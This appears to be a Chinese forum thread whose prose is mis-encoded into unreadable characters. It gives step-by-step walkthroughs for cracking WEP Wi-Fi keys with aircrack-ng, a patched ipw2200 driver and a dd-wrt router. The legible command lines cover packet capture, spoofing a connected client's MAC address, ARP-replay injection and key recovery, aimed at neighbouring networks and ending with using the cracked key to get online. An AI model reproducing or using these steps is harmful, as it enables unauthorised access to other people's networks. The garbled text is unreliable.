BT3ÍêÃÀÖ§³ÖIntel 2200BG£¬ÆÆ½âÓпͻ§¶ËWEP³É¹¦
¸Õ¸ÕÓÃÁ˲»µ½30·ÖÖÓÔÚBT3ÏÂÓÃ2200ÆÆ½âÁËÒ»¸öwep£¬Ð´Ò»Ï¾ßÌåµÄ·½·¨£¬ÎÒÏë2200µÄ¿¨»¹ÊǷdz£ÆÕ¼°µÄ£¬ÓÐÐËȤµÄ¿ÉÒÔÈ¥ÊÔÊÔ¿´¡£
ÔÚBT2ÏÂÒ»Ö±ÕÒ²»µ½2200µÄ¿¨£¬×òÌìÏÂÁËBT3£¬½ñÌìÒ²ÊDZ§×ÅÊÔÊÔ¿´µÄÐÄÇ飬×îºóÔÚÊÔÒ»°Ñ£¬²»ÐоÍÂòLINKSYS WUSB54G£¬
ÒòΪÔÚ¹úÍâµÄÍøÕ¾ÉÏרÃÅÓÐһƪ½éÉÜ2200ÆÆ½âµÄ£¬·½·¨ºÍÒ»°ãµÄ²»Ò»Ñù£¬
¶ÔÓÚÏñÎÒÕâÖÖ²ËÄñÀ´ËµÕâÖÖÎÄÕÂÊÇÔÙÊʺϲ»¹ýµÄÁË¡£
°ÑÈ«²¿ÍêÕûµÄÃüÁîдһÏ£¬¿ÉÒԲο¼Ï£¬
1;´ò¿ª´°¿Ú£¬ÊäÈë
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
2;
iwconfig eth1 ap
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
3;
fconfig eth1 up
ifconfig rtap0 up
4;
airodump-ng --channel --bssid -w dumpfile rtap0
ÕâʱÄã¹Û²ìstationÏÂÃæÊDz»ÊÇÓжԷ½µÄ»úÆ÷£¬Èç¹û¿Í»§¶ËÓÐÔÚÉÏÍø£¬ÄÇôstationÏÂÃæ¾Í»áÓжԷ½µÄMAC,¼ÇÏÂÀ´¡£
5; ´ò¿ªÐµĴ°¿Ú£¬ÊäÈë
aireplay-ng --arpreplay -b -h <¿Í»§»úµÄ MAC> -i rtap0 eth1
´ËʱÈç¹û¶Ô·½Óпͻ§¶ËÔÚÉÏÍø£¬ÄÇôDATAµÄÊý¾Ý»áÔö¼Ó£¬ÎҸղŵÄÇé¿öÊÇÓпͻ§¶Ë£¬µ«ÊÇRXQÐźźÜÈõ£¬²î²»¶àÖ»ÓÐ13×óÓÒ£¬10·ÖÖÓ²ÅÔö¼ÓÁË300¸ö date£¬²»¹ý10·ÖÖÓºóRXQ³¬¹ý50£¬½Ó×ÅDATA¼«ËÙÔö¼Ó£¬´ËʱÔÚµÚ5²½´ò¿ªµÄ´°¿ÚÖУ¬ARPµÃµ½µÄÊý¾ÝÒ²»áͬʱÔö¼Ó¡£
6£» µ±DATA³¬¹ý100000ºó£¬´ò¿ªÐµĴ°¿Ú£¬ÊäÈë
aircrack-ng -z -b dumpfile*.cap
È»ºó¾Í´ó¹¦¸æ³É£¬³ÏÂÃÜÂ룬ÉÏÍøÈ¥°É£¬ºÙºÙ¡£
ÉÏÃæ¾ÍÊÇBT3¹âÅÌÆô¶¯Ï£¬×î¼òµ¥µÄÆÆ½âÓпͻ§¶ËWEPµÄÈ«²¿¹ý³Ì£¬Èç¹ûÐźźõϰ£¬¹À¼ÆÒ²¾Í10À´·ÖÖӸ㶨¡£
Ps£»ÉÏÃæÃüÁîÖеÄ< >ÊDz»ÐèÒªµÄ¡£
--------------------------------------------------------------------------------------------------------------------------------------------
»ùÓÚѸ³ÛÐ¾Æ¬ÆÆ½âWEP
05ÔÂ 7th, 2007
ÄãÓ¦¸ÃÖªµÀ£¬WEPÒѾ±»Ö¤ÊµÎª²»°²È«µÄ¼ÓÃÜ·½Ê½£¬µ«ÊÂʵÉÏËüÈÔÔÚ±»¹ã·ºÊ¹Ó㬰üÀ¨ÔÚÎÒ×Ô¼ºµÄ¹¤×÷³¡ËùºÍ¼Ò£¨×î½ü²Å°Ñ¼ÒÀïµÄWi-Fi°²È«ÉèÖôÓ104λWEPÐÞ¸ÄΪWPA1/TKIP£©¡£
ÄÇôWEPµÄ°²È«ÐÔµ½µ×ÈçºÎ£¬»òÕß˵¶ÔÓÚÓû§ÆÆ½âWEPµÄÄѶÈÓжà´ó£¬¾ö¶¨×Ô¼º×öÒ»¸ö²âÊÔ¡£
ÔÚ½øÈëÏÂÃæµÄÄÚÈÝ֮ǰÉùÃ÷Ò»µã£¬·Ç·¨½ÓÈëËûÈ˵ÄÍøÂçÊDz»µÀµÂºÍ·Ç·¨µÄ¡£
ʹÓõÄ×îÖ÷ÒªµÄ¹¤¾ß½Ð×öaircrack-ng£¨ngÊÇÏÂÒ»´úµÄÒâ˼£©£¬aircrack-ngÊÇÒ»¸öÆÆ½â802.11ÍøÂçµÄ¹¤¾ßÌ×¼þ£¬°üÀ¨airodump-ng¡¢aireplay-ng¡¢aircrack-ng¡¢airmon-ngµÈ¡£aircrack-ngµÄ»ù±¾ÔÀíÊÇÊ×ÏÈÊÕ¼¯×ã¹»¶àµÄ¼ÓÃÜÊý¾Ý°ü£¬È»ºóͨ¹ýͳ¼ÆÑ§¼ÆËã»Ö¸´WEP¿ÚÁî¡£
¶ÔÓÚ40λWEPͨ³£ÐèÒª30Íò¸öIVs£¨Initialization Vector£©£¬¶ÔÓÚ104λWEPÔòÐèÒª150-200Íò¸öIVs¡£2007Äê4ÔÂ25ÈÕ£¬aircrack-ng 0.8°æ±¾·¢²¼¡£
»·¾³£º
Ä¿±êAP£º11ƵµÀ£¬BSSIDÊÇ00:0f:e2:xx:xx:xx£»
ÎÞÏßÍøÂç¿Í»§¶Ë£ºÎÒʹÓõÄÊDZ¼ÌÚM´¦ÀíÆ÷ºÍIntel PRO/Wireless 2200BG£¨IPW2200£©£¬¿Í»§¶ËµÄMACµØÖ·ÊÇ00:12:f0:xx:xx:xx¡£Èç¹ûÄãÔÚʹÓÿáî£2ºÍIPW3945£¬ÄÇôÄãÐèÒª²ÉÓò»Í¬µÄ·½·¨¡£ÊÂʵÉÏ£¬aircrack-ng²»ÄܺܺõĺÍѸ³ÛоƬһÆð¹¤×÷¡£Èç¹ûÄãµÄÎÞÏßÍø¿¨Ê¹ÓÃAtherosоƬ£¬ÄÇôÄãµÄÀ§ÄÑ»áÉٺܶࡣ
ÓÉÓÚairodump-ngÔÚWindowsÏÂʹÓõÄÇý¶¯³ÌÐòPEEK²»Ö§³ÖѸ³Û£¬ËùÒÔÐèÒªÒ»¸öLinux²Ù×÷ϵͳ»·¾³¡£ÎÒʹÓõÄÊÇUbuntu 6.06 LTS¡£ÁíÍ⣬Ä㻹ÐèÒªÒ»¸ö¸¨ÖúÓõÄAP£¨Í¨³£Ñ¡×Ô¼ºµÄÄÇһ̨£¬ÊÂÏÈÈ¡ÏûËüµÄ°²È«ÉèÖ㬲¢ÈÃËüͬÑù¹¤×÷ÔÚ11ƵµÀ£©£¬ºÍÒ»¸öÁ¹Ë¬µÄÒ¹Íí£¨¿ª¸öÍæÐ¦£¬ÎÒÊÇ˵ÐèÒªÓлîÔ¾¿Í»§¶ËÔÚʹÓÃÄ¿±êAP£¬ÄÇͨ³£ÊÇÔÚÍí·¹ºó£©¡£
ÏÂÃæ½øÈëÕýÌ⣬Ê×ÏȰ²×°ËùÐèϵͳ×é¼þ£º
sudo apt-get update
sudo apt-get install build-essential
ÏÂÔØËùÐè³ÌÐòºÍ²¹¶¡£¬½âѹ£¬°²×°£º
wget http://superb-west.dl.sourceforge.net/sourceforge/ieee80211/ieee80211-1.2.17.tar.gz
wget http://superb-west.dl.sourceforge.net/sourceforge/ipw2200/ipw2200-1.2.1.tgz
wget http://www.box.net/shared/j3qvacbbmb
wget http://download.aircrack-ng.org/aircrack-ng-0.8.tar.gz
tar zxvf ieee80211-1.2.17.tar.gz
cd ieee80211-1.2.17
sudo make
sudo make install
cd ..
tar zxvf ipw2200-1.2.1.tgz
tar zxvf ipw2200-1.2.1-inject_patch.tar.gz
patch ipw2200-1.2.1/ipw2200.c ipw2200-1.2.1-inject.patch
patch ipw2200-1.2.1/Makefile ipw2200-1.2.1-inject_Makefile.patch
cd ipw2200-1.2.1
sudo ./remove-old
sudo make
sudo make install
cd ..
tar zxvf aircrack-ng-0.8.tar.gz
cd aircrack-ng-0.8
sudo make
sudo make install
¼ÙÉèͨ¹ýifconfig¿´µ½ÎÞÏßÍø¿¨½Ó¿ÚÊÇeth1£¬ÏÂÃæÌí¼ÓÓÃÓÚ¼àÌýµÄrtap½Ó¿Ú¡£ÁíÍâ˵һ¾ä£¬ÔÚÒÔϵĹý³ÌÖУ¬eth1½Ó¿ÚʼÖÕ´¦ÓÚManagedģʽ£¬¶ø²»ÊÇMonitorģʽ£º
cd ipw2200-1.2.1
sudo rmmod ipw2200
sudo insmod ipw2200.ko rtap_iface=1
½ñºóÖØÆô»úÆ÷ºó²»ÔÙÐèÒªÌí¼Órtap½Ó¿Ú£¬Ö»ÐèÒª£º
sudo rmmod ipw2200
sudo modprobe ipw2200 rtap_iface=1
ÏÂÃæ¿ªÊ¼Ò»¸ö¼àÌý£º
sudo airodump-ng rtap0
½á¹û´°¿Ú·ÖΪÉÏÏÂÁ½¸öÇøÓò£¬ÉÏÃæÊÇAP£¬ÏÂÃæÊǿͻ§¶Ë¡£AP´óԼÿÃëÖÓ·¢Éä10¸öbeacon frames£¬Äã»á·¢ÏÖËüÔö³¤µÄºÜ¿ì£¬µ«ÄÇûÓÐÓô¦¡£µ±ÄãÔÚÏÂÃæµÄÇøÓòÖз¢ÏÖÖÁÉÙÓÐÒ»¸ö¿Í»§¶Ë¹ØÁªµ½ÁËÄ¿±êAP£¬²¢ÇÒÔÚÄ¿±êAPÉÏÒѾ¼àÌýµ½ÁËһЩdata°ü£¬Õâ¾Í¹»ÁË¡£ºË¶ÔÄ¿±êAPµÄ»ù±¾ÐÅÏ¢£¬²¢¼ÇÏÂÒ»¸ö¹ØÁª¿Í»§¶ËµÄMACµØÖ·00:13:02:xx:xx:xx¡£¹Ø±ÕÕâ¸ö³ÌÐò¡£
ÓÉÓÚ¼´±ãÔÚLinuxÏ£¬IPW2200»¹ÊDz»Ö§³Öfake authentication£¨-1¹¥»÷£©£¬ËùÒÔÏÂÃæÍ¨¹ýÐÞ¸ÄMACµØÖ·À´Î±×°ÄǸöºÏ·¨µÄ¿Í»§¶Ë£º
sudo ifconfig eth1 down
sudo ifconfig eth1 hw ether 00:13:02:xx:xx:xx
sudo ifconfig eth1 up
sudo ifconfig rtap0 up
ÏÖÔÚÓÃÉϸ¨ÖúAPÁË£¬°Ñeth1Á¬½Óµ½Ëü£¬ÄãÓ¦¸Ã²»»áÓöµ½Ê²Ã´À§ÄÑ£¬ÒòΪÕâÊÇ×Ô¼ºµÄAP¡£È»ºó£º
sudo iwconfig eth1 key off
×îÓÐȤµÄ²¿·Öµ½À´ÁË£¬¿ªÊ¼²¶×½£º
sudo airodump-ng rtap0 -c 11 --bssid 00:0f:e2:xx:xx:xx --ivs -w dump
ÀíÂÛÉÏ˵£¬Äã¿ÉÒԵȴý²¶»ñµÄIVs»ýÀÛµ½°ÙÍòÊýÁ¿¼¶£¬µ«ÄÇ»áÊÇÒ£Ò£ÎÞÆÚ¡£ÐÒºÃaircrack-ngÌṩÁË×¢É乤¾ß£¬Ö÷¶¯µÄ×öARPÇëÇóÖØ·Å£¨-3¹¥»÷£©£¬Ëü»á´ó´ó´Ì¼¤·¢ÉúµÄÊý¾ÝÁ¿¡£´ò¿ªÒ»¸öд°¿Ú£º
sudo aireplay-ng -3 -b 00:0f:e2:xx:xx:xx -h 00:13:02:xx:xx:xx -i rtap0 eth1
Èç¹ûÄã×öÁËÉÏÃæµÄÈ«²¿£¬IVÈÔ¾ÉÔö³¤»ºÂý£¬ºÜÓпÉÄÜÊÇÒòΪÄãËùαװµÄ¿Í»§¶ËÀ뿪ÁËÄ¿±êAP£¬ÄÇôÄÍÐÄЩÉÔºòÔÙÊÔ¡£
×îºó£¬½øÐÐÆÆ½â¼ÆË㣨ÊÂʵÉÏairodump-ng¡¢aireplay-ng¡¢aircrack-ng¿ÉÒÔͬʱÔËÐУ©¡£´ò¿ªÒ»¸öд°¿Ú£º
aircrack-ng -x dump*.ivs
21·Ö30ÃëÖ®ºó£¬Ê¹ÓÃ364735¸öIVs£¬KEY FOUND£¡ÕâÊÇÒ»¸ö40λWEP¡£
ºó»°£¬¼¸¸öµÂ¹úѧÉúдµÄaircrack-ptw¿ÉÒÔ½øÒ»²½ÌáÉýÆÆ½âµÄЧÂÊ£¬ÓÐÐËȤµÄ¶ÁÕß¿ÉÒÔ³¢ÊÔ¡£µ±È»£¬aircrack-ptw»áÔÚºÏÊʵÄʱºò²¢Èëaircrack-ngÏîÄ¿¡£
--------------------------------------------------------------------------------------------------------------------------------------------
ÒòΪbrodcomоƬµÄdd-wrtÇý¶¯²»Ö§³Öinjection×¢ÈëÀ´¼Ó¿ìÆÆ½âËÙ¶È¡£ËùÒÔÖ»ÄÜÊØÖê´ýÍá£
ÔÚdd-wrtÉÏÎÞÏß״̬ҳ×îÏÂÃæÓÐSite Survey, ¸½½ü72dbµÄwep¼ÓÃÜ¡£Ã¿ÃëÖÓÖ»Óм¸¸ö°ü£¬¿ª»úÒ»Ìì×¥µ½2w¸ö£¬ÍíÉÏ»ØÀ´Ë²¼äÆÆ½â³ö»õ¡£
ÒòΪÖ÷ÌùÒѾ²»ÄÜÐ޸ģ¬ÕâÀïÖØ¸´ÕûÀíһϹý³Ì£º
dd-wrt£¨v24 rc5)ÉÏÉèÖãº
1. dd-wrt×îºÃÊÇmini°æ£¬webÒ³ÃæÉÏ´ò¿ªjffs£¬ÓÃÀ´°²×°³ÌÐò¡£
2¡£webÉÏstatus->wireless->site surveyÕÒµ½ÄãÒª¸ÉµôµÄÎÞÏß·ÓÉËùÔÚÆµµÀ
È»ºó°ÑÄãµÄÎÞÏß·ÓÉÉèÖóÉapģʽ£¬ÆµµÀ¾ÍÊÇÄ¿±êƵµÀ¡£
3. telnetµ½Â·ÓÉÆ÷£¬°²×°Èí¼þ(ÆÆ½âÍê³Éáá/jffsĿ¼ÏÂÕâЩÈí¼þ¶¼¿ÉÒÔɾµô£©£º
cd /jffs
wget http://downloads.openwrt.org/whiterussian/0.9/packages/wireless-tools_28.pre7-1_mipsel.ipk
ipkg install wireless-tools_28.pre7-1_mipsel.ipk
wget http://lvdong.net/steeven/airserv-ng
4. ¿ªÊ¼¼àÌý£º
wl monitor 1
./airserv-ng -d prism0 & ÕâʱӦ¸Ã¿ÉÒÔ¿´µ½Æô¶¯ÐÅÏ¢£¬ÆµµÀÊÇ1û¹ØÏµ¡£Ò»Ñù¿ÉÒÔ¼àÌýÄãÐèÒªµÄƵµÀ¡£
5. ÔÚµçÄÔÉÏÏÂÔØhttp://lvdong.net/steeven/aircrack-ng-1.0-dev-win32.zip,
½âѹáá½øÈëcmd¿ªÊ¼¼àÌý·ÓÉÆ÷ÉϵÄÎÞÏßÊý¾Ý£ºairodump-ng.exe 192.168.1.1:666 --channel 11 -w dump¡£
Õâ¸ö¾ÍÊÇÎÒÃÇÊìϤµÄ×¥°üÁË¡£ÎҵķÓÉÆ÷ipÊÇ192.168.1.1£¬ÄãµÄip×Ô¼º¿´È¥¡£11Ò²ÒªÌæ»»³ÉÄǸöÒª¸É»îµÄƵµÀ¡£×¢ÒâÒòΪdd-wrt²»ÄÜ×¢Èë£¬ÊØÖê´ýÍÃÒ»ÃëÖÓÖ»Óм¸¸ö. ÎÒÕâÒ»ÌìµÈµ½2w¸ö¡£
6. Èç¹ûÊý¾Ý¹»ÁË£¬ÔËÐÐaircrack-ng.exe dump*.cap¡£µÈ×Å¿´½á¹û°É
±¸×¢£º
1. Èç¹û¶Ô·½ÐźÅÇ¿¶È²»×ã´óÓÚ80, Ö»ÄÜÓÃÀ´¿´¿´ÍøÒ³£¬ËٶȺܲ
2. ½¨Òé°ÑÎÞÏß·Óɷŵ½´°¿Ú¡¢Ñǫ̂ÉÏ£¬¿ÉÒÔÊÕµ½¸ü¶àÐźš£
3. ³É¹¦áὨÒéÓÃdd-wrtµÄbridgeģʽÀ´¹²Ïí£¬¼´Ê¹¶Ô·½ÐźźÜÈõ£¬ÓÐdd-wrtÔÚ´°¿ÚÌæÄãÖм̡£
4. ÓÐÌõ¼þµÄ¿ÉÒÔ¸øDD-wrt½ÓÌìÏߣ¬±ÈµçÄÔ½ÓÌìÏßÀ´µÄÈÝÒס£
5. Èç¹ûÐźźÜÈõ£¬Öм̵Äʱºò¿ÉÒÔµ÷´ó·¢É书ÂÊÊÔÊÔ¡£
6. ÖмÌáᣬdd-wrt²»ÄÜÔÙ×öpppoe(adsl/ÍøÍ¨/ÓÐÏßͨ)²¦ºÅ£¬½¨Òé²åÈëdd-wrtµÄÆÕͨ¿ÚÉÏ£¬ÐèÒªµÄʱºòÔÚµçÄÔÉϲ¦ºÅ¡£
7. dd-wrtÄܲ»ÄÜʵÏÖÎÞÏßÖм̺ÍÒÑÓй̶¨¿í´øË«ÖØÁ¬½Ó¸ºÔؾùºâ£¿²ßÂÔ¿ÉÒÔÊÇip¶Î»òÕßÐÒ顣ϣÍû¸ßÊÖÖ¸µã¡£
dd-wrt³õʼÔËÐÐÖм̽ű¾£¬Æô¶¯ÎÞÏßmonitorģʽºÍaireplay...ɵ¹Ïʽ¡£¡£¡£
|